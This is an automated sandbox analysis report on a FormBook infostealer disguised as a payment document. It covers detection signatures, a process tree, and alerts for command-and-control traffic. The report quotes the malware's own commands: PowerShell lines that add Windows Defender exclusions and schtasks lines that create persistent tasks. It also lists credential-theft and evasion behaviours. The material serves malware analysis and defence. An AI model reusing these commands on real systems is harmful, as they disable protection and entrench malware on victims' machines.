Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PAYMENT SWIFT COPY.exe

Overview

General Information

Sample name:PAYMENT SWIFT COPY.exe
Analysis ID:1618747
MD5:5e69ebec05f9968afd7e3cfc81ad54c8
SHA1:ab2829123841c91e58a191338f924f3d5e86c41a
SHA256:8d8bb9cc17e7e3bfda2630a37f1b8866fed36b43765ef579977684c7fcc6ee7b
Tags:exeFormbookPaymentuser-cocaman
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • PAYMENT SWIFT COPY.exe (PID: 7508 cmdline: "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe" MD5: 5E69EBEC05F9968AFD7E3CFC81AD54C8)
    • powershell.exe (PID: 7676 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7744 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8040 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7804 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NCchtKNKiPqC" /XML "C:\Users\user\AppData\Local\Temp\tmpFA76.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PAYMENT SWIFT COPY.exe (PID: 7964 cmdline: "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe" MD5: 5E69EBEC05F9968AFD7E3CFC81AD54C8)
      • drfYhRLxnrcfFY.exe (PID: 5856 cmdline: "C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\pS8cQ1dsti0k.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • xcopy.exe (PID: 1312 cmdline: "C:\Windows\SysWOW64\xcopy.exe" MD5: 7E9B7CE496D09F70C072930940F9F02C)
          • drfYhRLxnrcfFY.exe (PID: 2088 cmdline: "C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\9FhWekDMXDU.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 7980 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
        • xcopy.exe (PID: 7940 cmdline: "C:\Windows\SysWOW64\xcopy.exe" MD5: 7E9B7CE496D09F70C072930940F9F02C)
  • NCchtKNKiPqC.exe (PID: 8032 cmdline: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe MD5: 5E69EBEC05F9968AFD7E3CFC81AD54C8)
    • schtasks.exe (PID: 7256 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NCchtKNKiPqC" /XML "C:\Users\user\AppData\Local\Temp\tmp1179.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • NCchtKNKiPqC.exe (PID: 7284 cmdline: "C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe" MD5: 5E69EBEC05F9968AFD7E3CFC81AD54C8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000014.00000002.4143260862.00000000057D0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000013.00000002.1987208170.0000000000110000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000F.00000002.4141273840.0000000002D30000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000008.00000002.1867935515.0000000001810000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000E.00000002.4145888813.00000000067A0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 8 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            8.2.PAYMENT SWIFT COPY.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              8.2.PAYMENT SWIFT COPY.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe", ParentImage: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe, ParentProcessId: 7508, ParentProcessName: PAYMENT SWIFT COPY.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe", ProcessId: 7676, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe", ParentImage: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe, ParentProcessId: 7508, ParentProcessName: PAYMENT SWIFT COPY.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe", ProcessId: 7676, ProcessName: powershell.exe
                Sigma detected: Suspicious Add Scheduled Task Parent
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NCchtKNKiPqC" /XML "C:\Users\user\AppData\Local\Temp\tmp1179.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NCchtKNKiPqC" /XML "C:\Users\user\AppData\Local\Temp\tmp1179.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe, ParentImage: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe, ParentProcessId: 8032, ParentProcessName: NCchtKNKiPqC.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NCchtKNKiPqC" /XML "C:\Users\user\AppData\Local\Temp\tmp1179.tmp", ProcessId: 7256, ProcessName: schtasks.exe
                Sigma detected: Suspicious Copy From or To System Directory
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\xcopy.exe", CommandLine: "C:\Windows\SysWOW64\xcopy.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\xcopy.exe, NewProcessName: C:\Windows\SysWOW64\xcopy.exe, OriginalFileName: C:\Windows\SysWOW64\xcopy.exe, ParentCommandLine: "C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\pS8cQ1dsti0k.exe" , ParentImage: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exe, ParentProcessId: 5856, ParentProcessName: drfYhRLxnrcfFY.exe, ProcessCommandLine: "C:\Windows\SysWOW64\xcopy.exe", ProcessId: 1312, ProcessName: xcopy.exe
                Sigma detected: Suspicious Schtasks From Env Var Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NCchtKNKiPqC" /XML "C:\Users\user\AppData\Local\Temp\tmpFA76.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NCchtKNKiPqC" /XML "C:\Users\user\AppData\Local\Temp\tmpFA76.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe", ParentImage: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe, ParentProcessId: 7508, ParentProcessName: PAYMENT SWIFT COPY.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NCchtKNKiPqC" /XML "C:\Users\user\AppData\Local\Temp\tmpFA76.tmp", ProcessId: 7804, ProcessName: schtasks.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe", ParentImage: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe, ParentProcessId: 7508, ParentProcessName: PAYMENT SWIFT COPY.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe", ProcessId: 7676, ProcessName: powershell.exe

                Persistence and Installation Behavior

                barindex
                Sigma detected: Scheduled temp file as task from temp location
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NCchtKNKiPqC" /XML "C:\Users\user\AppData\Local\Temp\tmpFA76.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NCchtKNKiPqC" /XML "C:\Users\user\AppData\Local\Temp\tmpFA76.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe", ParentImage: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe, ParentProcessId: 7508, ParentProcessName: PAYMENT SWIFT COPY.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NCchtKNKiPqC" /XML "C:\Users\user\AppData\Local\Temp\tmpFA76.tmp", ProcessId: 7804, ProcessName: schtasks.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-19T05:51:41.694031+010020507451Malware Command and Control Activity Detected192.168.2.449742199.59.243.22880TCP
                2025-02-19T05:52:05.660899+010020507451Malware Command and Control Activity Detected192.168.2.4497478.210.49.13980TCP
                2025-02-19T05:52:19.867547+010020507451Malware Command and Control Activity Detected192.168.2.44982313.248.169.4880TCP
                2025-02-19T05:52:33.042140+010020507451Malware Command and Control Activity Detected192.168.2.44991713.248.169.4880TCP
                2025-02-19T05:52:46.337499+010020507451Malware Command and Control Activity Detected192.168.2.450006162.0.213.9480TCP
                2025-02-19T05:52:59.763805+010020507451Malware Command and Control Activity Detected192.168.2.450028144.76.229.20380TCP
                2025-02-19T05:53:13.183855+010020507451Malware Command and Control Activity Detected192.168.2.450032188.114.96.380TCP
                2025-02-19T05:53:26.347163+010020507451Malware Command and Control Activity Detected192.168.2.4500363.33.130.19080TCP
                2025-02-19T05:53:39.677379+010020507451Malware Command and Control Activity Detected192.168.2.45004092.204.40.9880TCP
                2025-02-19T05:53:53.303255+010020507451Malware Command and Control Activity Detected192.168.2.450044104.21.112.180TCP
                2025-02-19T05:54:06.452124+010020507451Malware Command and Control Activity Detected192.168.2.45004813.248.169.4880TCP
                2025-02-19T05:54:25.652508+010020507451Malware Command and Control Activity Detected192.168.2.45005213.248.169.4880TCP
                2025-02-19T05:54:38.861149+010020507451Malware Command and Control Activity Detected192.168.2.4500563.33.130.19080TCP
                2025-02-19T05:54:52.002117+010020507451Malware Command and Control Activity Detected192.168.2.45006013.248.169.4880TCP
                2025-02-19T05:55:05.193226+010020507451Malware Command and Control Activity Detected192.168.2.4500643.33.130.19080TCP
                2025-02-19T05:55:20.921589+010020507451Malware Command and Control Activity Detected192.168.2.45006847.83.1.9080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-19T05:51:41.694031+010028554651A Network Trojan was detected192.168.2.449742199.59.243.22880TCP
                2025-02-19T05:52:05.660899+010028554651A Network Trojan was detected192.168.2.4497478.210.49.13980TCP
                2025-02-19T05:52:19.867547+010028554651A Network Trojan was detected192.168.2.44982313.248.169.4880TCP
                2025-02-19T05:52:33.042140+010028554651A Network Trojan was detected192.168.2.44991713.248.169.4880TCP
                2025-02-19T05:52:46.337499+010028554651A Network Trojan was detected192.168.2.450006162.0.213.9480TCP
                2025-02-19T05:52:59.763805+010028554651A Network Trojan was detected192.168.2.450028144.76.229.20380TCP
                2025-02-19T05:53:13.183855+010028554651A Network Trojan was detected192.168.2.450032188.114.96.380TCP
                2025-02-19T05:53:26.347163+010028554651A Network Trojan was detected192.168.2.4500363.33.130.19080TCP
                2025-02-19T05:53:39.677379+010028554651A Network Trojan was detected192.168.2.45004092.204.40.9880TCP
                2025-02-19T05:53:53.303255+010028554651A Network Trojan was detected192.168.2.450044104.21.112.180TCP
                2025-02-19T05:54:06.452124+010028554651A Network Trojan was detected192.168.2.45004813.248.169.4880TCP
                2025-02-19T05:54:25.652508+010028554651A Network Trojan was detected192.168.2.45005213.248.169.4880TCP
                2025-02-19T05:54:38.861149+010028554651A Network Trojan was detected192.168.2.4500563.33.130.19080TCP
                2025-02-19T05:54:52.002117+010028554651A Network Trojan was detected192.168.2.45006013.248.169.4880TCP
                2025-02-19T05:55:05.193226+010028554651A Network Trojan was detected192.168.2.4500643.33.130.19080TCP
                2025-02-19T05:55:20.921589+010028554651A Network Trojan was detected192.168.2.45006847.83.1.9080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-19T05:51:58.005944+010028554641A Network Trojan was detected192.168.2.4497438.210.49.13980TCP
                2025-02-19T05:52:00.561749+010028554641A Network Trojan was detected192.168.2.4497448.210.49.13980TCP
                2025-02-19T05:52:03.132700+010028554641A Network Trojan was detected192.168.2.4497458.210.49.13980TCP
                2025-02-19T05:52:11.162559+010028554641A Network Trojan was detected192.168.2.44977413.248.169.4880TCP
                2025-02-19T05:52:13.741833+010028554641A Network Trojan was detected192.168.2.44978813.248.169.4880TCP
                2025-02-19T05:52:17.320979+010028554641A Network Trojan was detected192.168.2.44980413.248.169.4880TCP
                2025-02-19T05:52:25.366215+010028554641A Network Trojan was detected192.168.2.44986513.248.169.4880TCP
                2025-02-19T05:52:27.944750+010028554641A Network Trojan was detected192.168.2.44988413.248.169.4880TCP
                2025-02-19T05:52:30.467555+010028554641A Network Trojan was detected192.168.2.44990113.248.169.4880TCP
                2025-02-19T05:52:38.701537+010028554641A Network Trojan was detected192.168.2.449953162.0.213.9480TCP
                2025-02-19T05:52:41.266204+010028554641A Network Trojan was detected192.168.2.449970162.0.213.9480TCP
                2025-02-19T05:52:43.785141+010028554641A Network Trojan was detected192.168.2.449989162.0.213.9480TCP
                2025-02-19T05:52:52.135587+010028554641A Network Trojan was detected192.168.2.450025144.76.229.20380TCP
                2025-02-19T05:52:54.675195+010028554641A Network Trojan was detected192.168.2.450026144.76.229.20380TCP
                2025-02-19T05:52:57.244965+010028554641A Network Trojan was detected192.168.2.450027144.76.229.20380TCP
                2025-02-19T05:53:05.396231+010028554641A Network Trojan was detected192.168.2.450029188.114.96.380TCP
                2025-02-19T05:53:07.957538+010028554641A Network Trojan was detected192.168.2.450030188.114.96.380TCP
                2025-02-19T05:53:10.627889+010028554641A Network Trojan was detected192.168.2.450031188.114.96.380TCP
                2025-02-19T05:53:18.695966+010028554641A Network Trojan was detected192.168.2.4500333.33.130.19080TCP
                2025-02-19T05:53:21.230305+010028554641A Network Trojan was detected192.168.2.4500343.33.130.19080TCP
                2025-02-19T05:53:23.776816+010028554641A Network Trojan was detected192.168.2.4500353.33.130.19080TCP
                2025-02-19T05:53:32.063522+010028554641A Network Trojan was detected192.168.2.45003792.204.40.9880TCP
                2025-02-19T05:53:34.611364+010028554641A Network Trojan was detected192.168.2.45003892.204.40.9880TCP
                2025-02-19T05:53:37.341964+010028554641A Network Trojan was detected192.168.2.45003992.204.40.9880TCP
                2025-02-19T05:53:45.453205+010028554641A Network Trojan was detected192.168.2.450041104.21.112.180TCP
                2025-02-19T05:53:48.012214+010028554641A Network Trojan was detected192.168.2.450042104.21.112.180TCP
                2025-02-19T05:53:50.709227+010028554641A Network Trojan was detected192.168.2.450043104.21.112.180TCP
                2025-02-19T05:53:58.820118+010028554641A Network Trojan was detected192.168.2.45004513.248.169.4880TCP
                2025-02-19T05:54:01.368365+010028554641A Network Trojan was detected192.168.2.45004613.248.169.4880TCP
                2025-02-19T05:54:03.914074+010028554641A Network Trojan was detected192.168.2.45004713.248.169.4880TCP
                2025-02-19T05:54:11.961130+010028554641A Network Trojan was detected192.168.2.45004913.248.169.4880TCP
                2025-02-19T05:54:14.491874+010028554641A Network Trojan was detected192.168.2.45005013.248.169.4880TCP
                2025-02-19T05:54:17.076889+010028554641A Network Trojan was detected192.168.2.45005113.248.169.4880TCP
                2025-02-19T05:54:31.184049+010028554641A Network Trojan was detected192.168.2.4500533.33.130.19080TCP
                2025-02-19T05:54:33.731061+010028554641A Network Trojan was detected192.168.2.4500543.33.130.19080TCP
                2025-02-19T05:54:36.286842+010028554641A Network Trojan was detected192.168.2.4500553.33.130.19080TCP
                2025-02-19T05:54:44.353056+010028554641A Network Trojan was detected192.168.2.45005713.248.169.4880TCP
                2025-02-19T05:54:46.906308+010028554641A Network Trojan was detected192.168.2.45005813.248.169.4880TCP
                2025-02-19T05:54:49.487616+010028554641A Network Trojan was detected192.168.2.45005913.248.169.4880TCP
                2025-02-19T05:54:57.524034+010028554641A Network Trojan was detected192.168.2.4500613.33.130.19080TCP
                2025-02-19T05:55:00.060684+010028554641A Network Trojan was detected192.168.2.4500623.33.130.19080TCP
                2025-02-19T05:55:02.592229+010028554641A Network Trojan was detected192.168.2.4500633.33.130.19080TCP
                2025-02-19T05:55:11.758908+010028554641A Network Trojan was detected192.168.2.45006547.83.1.9080TCP
                2025-02-19T05:55:14.306039+010028554641A Network Trojan was detected192.168.2.45006647.83.1.9080TCP
                2025-02-19T05:55:16.797281+010028554641A Network Trojan was detected192.168.2.45006747.83.1.9080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-19T05:51:58.005944+010028563181A Network Trojan was detected192.168.2.4497438.210.49.13980TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeReversingLabs: Detection: 27%
                Multi AV Scanner detection for submitted file
                Source: PAYMENT SWIFT COPY.exeVirustotal: Detection: 22%Perma Link
                Source: PAYMENT SWIFT COPY.exeReversingLabs: Detection: 27%
                Yara detected FormBook
                Source: Yara matchFile source: 8.2.PAYMENT SWIFT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.PAYMENT SWIFT COPY.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000014.00000002.4143260862.00000000057D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.1987208170.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.4141273840.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1867935515.0000000001810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.4145888813.00000000067A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1867200881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.4141340650.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.1984565405.0000000002C60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.4139835446.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.4141036989.00000000038E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1869778786.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: PAYMENT SWIFT COPY.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: PAYMENT SWIFT COPY.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: xcopy.pdbUGP source: PAYMENT SWIFT COPY.exe, 00000008.00000002.1867547077.0000000001447000.00000004.00000020.00020000.00000000.sdmp, NCchtKNKiPqC.exe, 0000000D.00000002.1981731850.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, drfYhRLxnrcfFY.exe, 0000000E.00000002.4140397411.00000000008EE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: PAYMENT SWIFT COPY.exe, 00000008.00000002.1868118362.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 0000000F.00000003.1867464774.0000000002B63000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000000F.00000002.4141524916.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 0000000F.00000003.1869081225.0000000002D19000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000000F.00000002.4141524916.000000000305E000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000013.00000003.1981470366.0000000002896000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000013.00000002.1987631254.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000013.00000002.1987631254.0000000002D9E000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000013.00000003.1983090305.0000000002A4F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: PAYMENT SWIFT COPY.exe, PAYMENT SWIFT COPY.exe, 00000008.00000002.1868118362.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, xcopy.exe, 0000000F.00000003.1867464774.0000000002B63000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000000F.00000002.4141524916.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 0000000F.00000003.1869081225.0000000002D19000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000000F.00000002.4141524916.000000000305E000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000013.00000003.1981470366.0000000002896000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000013.00000002.1987631254.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000013.00000002.1987631254.0000000002D9E000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000013.00000003.1983090305.0000000002A4F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: xcopy.pdb source: PAYMENT SWIFT COPY.exe, 00000008.00000002.1867547077.0000000001447000.00000004.00000020.00020000.00000000.sdmp, NCchtKNKiPqC.exe, 0000000D.00000002.1981731850.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, drfYhRLxnrcfFY.exe, 0000000E.00000002.4140397411.00000000008EE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: drfYhRLxnrcfFY.exe, 0000000E.00000000.1789131434.00000000007BF000.00000002.00000001.01000000.0000000D.sdmp, drfYhRLxnrcfFY.exe, 00000014.00000002.4139832157.00000000007BF000.00000002.00000001.01000000.0000000D.sdmp
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_0053C850 FindFirstFileW,FindNextFileW,FindClose,15_2_0053C850
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 4x nop then xor eax, eax15_2_00529EE0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 4x nop then mov ebx, 00000004h15_2_032104CF

                Networking

                barindex
                Suricata IDS alerts for network traffic
